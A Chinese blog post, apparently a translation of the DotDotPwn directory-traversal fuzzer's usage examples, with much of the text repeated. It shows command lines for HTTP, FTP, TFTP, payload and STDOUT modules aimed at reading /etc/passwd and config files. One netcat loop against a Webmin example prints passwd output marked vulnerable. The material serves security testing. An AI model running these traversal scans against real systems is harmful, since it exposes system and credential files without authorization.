- 浏览: 291523 次
-
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
原文地址:https://github.com/wireghoul/dotdotpwn/blob/master/EXAMPLES.txt
= HTTP Module
遍历引擎将会用8层深度来创建fuzz模式字符串,然后dotdotpwn会每个5秒(-t)来发送一个请求到一个监听在8080(-x)端口的web服务器(-m),该服务器的IP是192.168.1.1(-h)。除此以外,它将会尝试获得/etc/hosts文件来避免过滤,通过查找服务器响应中的localhost关键字(-k)来进行额外的检查,如果找到,那么认为含有漏洞。同时,获取web服务器的旗标(-s)。dotdotpwn会把结果保存在报告文件夹中的192.168.1.1_<date>_<hour>文件里。
DotDotPwn会尝试发现操作系统(-O),一旦发现,遍历引擎将会根据操作系统来创建fuzz模式。然后所有的http请求将会调整到指定的方法(-M POST)。在每个fuzz请求的结尾,将会追加.php后缀(-e)。-E告诉DotDotPwn寻找定义在TraversaEngine.pm文件中的@Extra_files(默认为config.inc.php和web.config)最后我们开启Bisection算法(-X)来发现额外的深度漏洞,所以如果发现一个漏洞,这个算法将尝试使用最小的深度来发现漏洞。
dotdotpwn会把结果保存在报告文件夹中的192.168.1.1_<date>_<hour>文件里。
= HTTP URL Module
真实案例http://www.securityfocus.com/bid/18744
DotDotPwn将会尝试发现运行在192.168.1.1的操作系统(-O),一旦发现,遍历引擎将会根据发现的操作系统来创建fuzz模式。然后引擎将会用创建的遍历模式替换url(-u)中的TRAVERSAL,然后向服务器的10000端口发送请求。最后为了避免过滤,检查服务器响应的额外关键字"root:",如果发现则存在漏洞。如果获取的文件是/etc/passwd,那么可以基本确定"root:"关键字肯定在文件的开头。
dotdotpwn会把结果保存在报告文件夹中的192.168.1.1_<date>_<hour>文件里。
= FTP Module
首先DotDotPwn将会尝试获取ftp服务器(-m)的旗标(-s),然后将会如果服务器不支持匿名登录,那么尝试使用指定的username(-U)和password(-P)来登录服务器。
一旦通过认证,它将会获取Windows系统(-o)中常见文件,并保存在retrieved_files指定的位置。同样,DotDotPwn不会输出每次尝试的详细细节,相反
它只会输出每个发现的遍历模式。
DotDotPwn会把结果保存在报告文件夹中的ftp_server.txt(-r)文件中
= TFTP Module
DotDotPwn会每隔一毫秒发送遍历模式到192.168.1.1(-h)的TFTP服务器(-m),也就是说尽可能的快速。然后当它发现一个漏洞时立即停止fuzz测试(-b)。
fuzz测试将会针对windows/system32/drivers/etc/hosts(-f)这个文件。
dotdotpwn会把结果保存在报告文件夹中的192.168.1.1_<date>_<hour>文件里。
= PAYLOAD Module
真实案例 http://www.securityfocus.com/bid/18744
遍历引擎将会用遍历模式替换payload文件(-p)中的TRAVERSAL,然后发送fuzzpayload到tcp监听10000端口(-x)的服务器(本例中我们假设它是Webmin)。
它的ip是192.168.1.1(-h)。最后DotDotPwn将会查找服务器响应中的"root:"关键字(-k),如果出现,则认为有漏洞。
如果要获得的文件是/etc/passwd (-f),那么基本可以肯定"root:"关键字会出现在文件的开头。
dotdotpwn会把结果保存在报告文件夹中的192.168.1.1_<date>_<hour>文件里。
= STDOUT Module
遍历引擎将会创建深度为8的fuzz模式,DotDotPwn将会把结果输出到STDOUT中,所以你可以随意使用,把遍历模式作为参数传递给其他程序,管道,socket等。
所以,你可以模块测试一切。包括客户端软件,文件格式fuzz,等等等等。
例如在你的脚步中使用STDOUT模块
-把fuzz模式作为参数传递给/bin/file和lynx
nitr0us@daiquiri ~/dotdotpwn-v3.0 $ for fuzz_pattern in $(./dotdotpwn.pl -m stdout -d 4 -f /etc/passwd); do file $fuzz_pattern; done
../etc/passwd: cannot open `../etc/passwd' (No such file or directory)
../../etc/passwd: cannot open `../../etc/passwd' (No such file or directory)
../../../etc/passwd: ASCII text
../../../../etc/passwd: ASCII text
..\etc\passwd: cannot open `..\etc\passwd' (No such file or directory)
..\..\etc\passwd: cannot open `..\..\etc\passwd' (No such file or directory)
..\..\..\etc\passwd: cannot open `..\..\..\etc\passwd' (No such file or directory)
... and so on..
nitr0us@daiquiri ~/dotdotpwn-v3.0 $ for fuzz_pattern in $(./dotdotpwn.pl -m stdout -d 2 -f /etc/foobar | head -12); do lynx $fuzz_pattern; done
Can't Access `file://localhost/home/nitr0us/etc/foobar'
Alert!: Unable to access document.
Can't Access `file://localhost/home/nitr0us/dotdotpwn-v3.0/..\etc\foobar'
Alert!: Unable to access document.
Can't Access `file://localhost/home/nitr0us/dotdotpwn-v3.0/..\..\etc\foobar'
Alert!: Unable to access document.
Can't Access `file://localhost/home/nitr0us/dotdotpwn-v3.0/..%2fetc%2ffoobar'
Alert!: Unable to access document.
Can't Access `file://localhost/home/nitr0us/dotdotpwn-v3.0/..%2f..%2fetc%2ffoobar'
Alert!: Unable to access document.
Can't Access `file://localhost/home/nitr0us/dotdotpwn-v3.0/..%5cetc%5cfoobar'
Alert!: Unable to access document.
一个使用模块的真实例子
http://www.securityfocus.com/bid/18744
首先把每个fuzz模式传递给perl来创建请求,然后通过管道,由netcat接收作为STDIN然后发送给192.168.1.1的10000端口。这样可以看到Webmin的响应(HTML代码)
然后过滤"root:"关键字,将会发现是否存在文件夹遍历漏洞
root:x:0:0:root:/root:/bin/bash
operator:x:11:0:operator:/root:/bin/bash
root:x:0:0:root:/root:/bin/bash
operator:x:11:0:operator:/root:/bin/bash
root:x:0:0:root:/root:/bin/bash
operator:x:11:0:operator:/root:/bin/bash
nitr0us@daiquiri ~/dotdotpwn-v3.0 $ VULNERABLE !!!!!!!!!!!!!!!!!!!!!!!!!
= HTTP Module
./dotdotpwn.pl -m http -h 192.168.1.1 -x 8080 -f /etc/hosts -k "localhost" -d 8 -t 200 -s
遍历引擎将会用8层深度来创建fuzz模式字符串,然后dotdotpwn会每个5秒(-t)来发送一个请求到一个监听在8080(-x)端口的web服务器(-m),该服务器的IP是192.168.1.1(-h)。除此以外,它将会尝试获得/etc/hosts文件来避免过滤,通过查找服务器响应中的localhost关键字(-k)来进行额外的检查,如果找到,那么认为含有漏洞。同时,获取web服务器的旗标(-s)。dotdotpwn会把结果保存在报告文件夹中的192.168.1.1_<date>_<hour>文件里。
./dotdotpwn.pl -m http -h 192.168.1.1 -O -X -M POST -e .php -E
DotDotPwn会尝试发现操作系统(-O),一旦发现,遍历引擎将会根据操作系统来创建fuzz模式。然后所有的http请求将会调整到指定的方法(-M POST)。在每个fuzz请求的结尾,将会追加.php后缀(-e)。-E告诉DotDotPwn寻找定义在TraversaEngine.pm文件中的@Extra_files(默认为config.inc.php和web.config)最后我们开启Bisection算法(-X)来发现额外的深度漏洞,所以如果发现一个漏洞,这个算法将尝试使用最小的深度来发现漏洞。
dotdotpwn会把结果保存在报告文件夹中的192.168.1.1_<date>_<hour>文件里。
= HTTP URL Module
真实案例http://www.securityfocus.com/bid/18744
./dotdotpwn.pl -m http-url -u http://192.168.1.1:10000/unauthenticated/TRAVERSAL -O -k "root:" -r webmin.txt
DotDotPwn将会尝试发现运行在192.168.1.1的操作系统(-O),一旦发现,遍历引擎将会根据发现的操作系统来创建fuzz模式。然后引擎将会用创建的遍历模式替换url(-u)中的TRAVERSAL,然后向服务器的10000端口发送请求。最后为了避免过滤,检查服务器响应的额外关键字"root:",如果发现则存在漏洞。如果获取的文件是/etc/passwd,那么可以基本确定"root:"关键字肯定在文件的开头。
dotdotpwn会把结果保存在报告文件夹中的192.168.1.1_<date>_<hour>文件里。
= FTP Module
./dotdotpwn.pl -m ftp -h 192.168.1.1 -s -U nitr0us -P n1tr0u5pwnzj00 -o windows -q -r ftp_server.txt
首先DotDotPwn将会尝试获取ftp服务器(-m)的旗标(-s),然后将会如果服务器不支持匿名登录,那么尝试使用指定的username(-U)和password(-P)来登录服务器。
一旦通过认证,它将会获取Windows系统(-o)中常见文件,并保存在retrieved_files指定的位置。同样,DotDotPwn不会输出每次尝试的详细细节,相反
它只会输出每个发现的遍历模式。
DotDotPwn会把结果保存在报告文件夹中的ftp_server.txt(-r)文件中
= TFTP Module
./dotdotpwn.pl -m tftp -h 192.168.1.1 -b -t 1 -f windows/system32/drivers/etc/hosts
DotDotPwn会每隔一毫秒发送遍历模式到192.168.1.1(-h)的TFTP服务器(-m),也就是说尽可能的快速。然后当它发现一个漏洞时立即停止fuzz测试(-b)。
fuzz测试将会针对windows/system32/drivers/etc/hosts(-f)这个文件。
dotdotpwn会把结果保存在报告文件夹中的192.168.1.1_<date>_<hour>文件里。
= PAYLOAD Module
真实案例 http://www.securityfocus.com/bid/18744
./dotdotpwn.pl -m payload -h 192.168.1.1 -x 10000 -p payload_sample_1.txt -k "root:" -f /etc/passwd
引用
payload_sample_1.txt (also included in this folder):
GET /unauthenticated/TRAVERSAL HTTP/1.0
GET /unauthenticated/TRAVERSAL HTTP/1.0
遍历引擎将会用遍历模式替换payload文件(-p)中的TRAVERSAL,然后发送fuzzpayload到tcp监听10000端口(-x)的服务器(本例中我们假设它是Webmin)。
它的ip是192.168.1.1(-h)。最后DotDotPwn将会查找服务器响应中的"root:"关键字(-k),如果出现,则认为有漏洞。
如果要获得的文件是/etc/passwd (-f),那么基本可以肯定"root:"关键字会出现在文件的开头。
dotdotpwn会把结果保存在报告文件夹中的192.168.1.1_<date>_<hour>文件里。
= STDOUT Module
./dotdotpwn.pl -m stdout -d 5
遍历引擎将会创建深度为8的fuzz模式,DotDotPwn将会把结果输出到STDOUT中,所以你可以随意使用,把遍历模式作为参数传递给其他程序,管道,socket等。
所以,你可以模块测试一切。包括客户端软件,文件格式fuzz,等等等等。
例如在你的脚步中使用STDOUT模块
-把fuzz模式作为参数传递给/bin/file和lynx
nitr0us@daiquiri ~/dotdotpwn-v3.0 $ for fuzz_pattern in $(./dotdotpwn.pl -m stdout -d 4 -f /etc/passwd); do file $fuzz_pattern; done
../etc/passwd: cannot open `../etc/passwd' (No such file or directory)
../../etc/passwd: cannot open `../../etc/passwd' (No such file or directory)
../../../etc/passwd: ASCII text
../../../../etc/passwd: ASCII text
..\etc\passwd: cannot open `..\etc\passwd' (No such file or directory)
..\..\etc\passwd: cannot open `..\..\etc\passwd' (No such file or directory)
..\..\..\etc\passwd: cannot open `..\..\..\etc\passwd' (No such file or directory)
... and so on..
nitr0us@daiquiri ~/dotdotpwn-v3.0 $ for fuzz_pattern in $(./dotdotpwn.pl -m stdout -d 2 -f /etc/foobar | head -12); do lynx $fuzz_pattern; done
Can't Access `file://localhost/home/nitr0us/etc/foobar'
Alert!: Unable to access document.
Can't Access `file://localhost/home/nitr0us/dotdotpwn-v3.0/..\etc\foobar'
Alert!: Unable to access document.
Can't Access `file://localhost/home/nitr0us/dotdotpwn-v3.0/..\..\etc\foobar'
Alert!: Unable to access document.
Can't Access `file://localhost/home/nitr0us/dotdotpwn-v3.0/..%2fetc%2ffoobar'
Alert!: Unable to access document.
Can't Access `file://localhost/home/nitr0us/dotdotpwn-v3.0/..%2f..%2fetc%2ffoobar'
Alert!: Unable to access document.
Can't Access `file://localhost/home/nitr0us/dotdotpwn-v3.0/..%5cetc%5cfoobar'
Alert!: Unable to access document.
一个使用模块的真实例子
http://www.securityfocus.com/bid/18744
首先把每个fuzz模式传递给perl来创建请求,然后通过管道,由netcat接收作为STDIN然后发送给192.168.1.1的10000端口。这样可以看到Webmin的响应(HTML代码)
nitr0us@daiquiri ~/dotdotpwn-v3.0 $ for fuzz_pattern in $(./dotdotpwn.pl -m stdout -d 5 -f /etc/passwd); do perl -e " print \"GET /unauthenticated/$fuzz_pattern HTTP/1.0\r\n\r\n\";" | nc localhost 10000; done
然后过滤"root:"关键字,将会发现是否存在文件夹遍历漏洞
nitr0us@daiquiri ~/dotdotpwn-v3.0 $ for fuzz_pattern in $(./dotdotpwn.pl -m stdout -d 5 -f /etc/passwd); do perl -e " print \"GET /unauthenticated/$fuzz_pattern HTTP/1.0\r\n\r\n\";" | nc localhost 10000; done | grep "root:"
root:x:0:0:root:/root:/bin/bash
operator:x:11:0:operator:/root:/bin/bash
root:x:0:0:root:/root:/bin/bash
operator:x:11:0:operator:/root:/bin/bash
root:x:0:0:root:/root:/bin/bash
operator:x:11:0:operator:/root:/bin/bash
nitr0us@daiquiri ~/dotdotpwn-v3.0 $ VULNERABLE !!!!!!!!!!!!!!!!!!!!!!!!!
发表评论
-
kali 2.0 broadcom wifi connection
2015-12-12 16:28 449引用apt-get install -y linux-head ... -
kali2.0中国源
2015-09-27 01:42 465#中科大kali源 deb http://mirrors.us ... -
如何找书
2015-09-20 19:21 351引用intitle:"index.of" ... -
linux 安装scrapy
2015-09-07 13:06 607由于scrapy对python3支持不是很好,所以使用pyth ... -
nginx reverse proxy cofinguration
2015-08-28 15:18 433based on our case, we need to h ... -
wpscan
2015-08-01 10:39 447https://www.digitalocean.com/co ... -
[转]linkedin_crawl
2015-06-30 00:24 488https://blog.netspi.com/collect ... -
arachni-web-ui使用
2015-06-10 01:04 2150最近在玩儿arachni,想试试arachni-ui-web, ... -
linux dd命令
2015-06-06 14:29 396dd if=/dev/hda of=disk.mbr coun ... -
HACKING NODEJS AND MONGODB
2015-06-04 23:52 347http://blog.websecurify.com/201 ... -
php object inject
2015-05-29 00:45 343解释: http://securitycafe.ro/2015 ... -
[转]Forcing XXE Reflection through Server Error Messages
2015-05-19 01:10 466原文地址:https://blog.netspi.com/fo ... -
CVE-2011-2461
2015-03-31 01:19 440http://blog.nibblesec.org/2015/ ... -
[译]从配置错误的web server中dump git数据
2015-03-26 01:07 602原文地址:https://blog.netspi.com/du ... -
[转]Microsoft Access sqli
2015-03-18 00:57 449https://milo2012.wordpress.com/ ... -
[转]sqlmap注入Microsoft Access
2015-03-18 00:49 1600https://github.com/sqlmapprojec ... -
Wine中使用MinGW
2015-03-17 00:49 657原文:http://null-byte.wonderhowto ... -
crossdomain.xml
2015-03-12 01:23 686参考: https://hackerone.com/repor ... -
[译]使用wireshark解密TLS浏览器流量
2015-03-12 00:57 4149原文地址:https://jimshaver.net/2015 ... -
xxe方法
2015-02-01 18:32 854原文地址:http://www.christian-schne ...
相关推荐
在使用DotDotPwn进行渗透测试时,你需要提供目标服务器的信息,包括URL、端口等,然后设置好测试参数,如线程数、请求速率等。运行后,DotDotPwn将自动进行目录遍历测试,并记录下任何可能的异常响应。此外,你可以...
python学习资源
jfinal-undertow 用于开发、部署由 jfinal 开发的 web 项目
基于Andorid的音乐播放器项目设计(国外开源)实现源码,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。
python学习资源
python学习资源
python学习一些项目和资源
【毕业设计】java-springboot+vue家具销售平台实现源码(完整前后端+mysql+说明文档+LunW).zip
HTML+CSS+JavaScarip开发的前端网页源代码
python学习资源
【毕业设计】java-springboot-vue健身房信息管理系统源码(完整前后端+mysql+说明文档+LunW).zip
成绩管理系统C/Go。大学生期末小作业,指针实现,C语言版本(ANSI C)和Go语言版本
1_基于大数据的智能菜品个性化推荐与点餐系统的设计与实现.docx
【毕业设计】java-springboot-vue交流互动平台实现源码(完整前后端+mysql+说明文档+LunW).zip
内容概要:本文主要探讨了在高并发情况下如何设计并优化火车票秒杀系统,确保系统的高性能与稳定性。通过对比分析三种库存管理模式(下单减库存、支付减库存、预扣库存),强调了预扣库存结合本地缓存及远程Redis统一库存的优势,同时介绍了如何利用Nginx的加权轮询策略、MQ消息队列异步处理等方式降低系统压力,保障交易完整性和数据一致性,防止超卖现象。 适用人群:具有一定互联网应用开发经验的研发人员和技术管理人员。 使用场景及目标:适用于电商、票务等行业需要处理大量瞬时并发请求的业务场景。其目标在于通过合理的架构规划,实现在高峰期保持平台的稳定运行,保证用户体验的同时最大化销售额。 其他说明:文中提及的技术细节如Epoll I/O多路复用模型以及分布式系统中的容错措施等内容,对于深入理解大规模并发系统的构建有着重要指导意义。
基于 OpenCV 和 PyTorch 的深度车牌识别
【毕业设计-java】springboot-vue教学资料管理系统实现源码(完整前后端+mysql+说明文档+LunW).zip
此数据集包含有关出租车行程的详细信息,包括乘客人数、行程距离、付款类型、车费金额和行程时长。它可用于各种数据分析和机器学习应用程序,例如票价预测和乘车模式分析。
把代码放到Word中,通过开发工具——Visual Basic——插入模块,粘贴在里在,把在硅基流动中申请的API放到VBA代码中。在Word中,选择一个问题,运行这个DeepSeekV3的宏就可以实现在线问答
【毕业设计】java-springboot+vue机动车号牌管理系统实现源码(完整前后端+mysql+说明文档+LunW).zip